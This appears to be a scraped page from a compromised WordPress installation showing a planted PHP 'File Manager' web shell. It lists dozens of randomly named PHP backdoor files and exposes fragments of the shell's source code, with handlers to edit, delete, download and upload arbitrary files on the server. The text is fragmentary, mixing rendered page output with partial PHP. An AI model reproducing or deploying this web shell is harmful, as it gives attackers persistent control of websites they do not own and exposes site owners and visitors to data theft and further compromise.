File Manager
Files in the directory:
0xEyvB3Zx1.php
5Jwd90Yk.php
SimplePie
Text
class-wp-comment-query.php
class-wp-locale.php
css
customize
fazemrx1949_8ix1Kdjg.php
fazemrx1949_Rq4TW5GM.php
fazemrx1949_ZD1LdB4E.php
fazemrx1949_c5rzqPl4.php
fazemrx1949_coEM5h8t.php
fazemrx1949_zf37MqYM.php
fk_OmTBgFJp.php
fk_gVHRowaZ.php
images
js
utchiha_zhMLyhse.php
widgets
wp_DcBLDy3e.php
wp_JuTIpJlX.php
wp_KgouTF97.php
wp_MyNhKeIG.php
wp_PFaUx73F.php
wp_dz4Uo4A4.php
wp_h6bAp6I7.php
wp_mqNo1vwF.php
wp_qDzcxuQ9.php
wp_rj3CIGcd.php
wp_rkJEUmYl.php
wp_tvPRLsm2.php
wp_xd7JxHWI.php
Upload a File
Upload
Edit File: fazemrx1949_zf37MqYM.php
File '$filename' has been updated.
"; } break; case 'delete': if (file_exists($path)) { unlink($path); echo "
File '$filename' has been deleted.
"; } break; case 'download': if (file_exists($path)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile($path); exit; } break; case 'upload': if (isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $uploadedFile = $_FILES['file']; $uploadedFilename = $uploadedFile['name']; $uploadedFilePath = $directory . $uploadedFilename; if (move_uploaded_file($uploadedFile['tmp_name'], $uploadedFilePath)) { echo "
File '$uploadedFilename' has been uploaded.
"; } else { echo "
Error uploading file '$uploadedFilename'.
"; } } break; } } } // Get the list of files in the directory $files = scandir($directory); ?>
Login
File Manager
Files in the directory:
" . $file . ""; } } ?>
Upload a File
Upload
Edit File:
Save
Download
Delete
Save
Download
Delete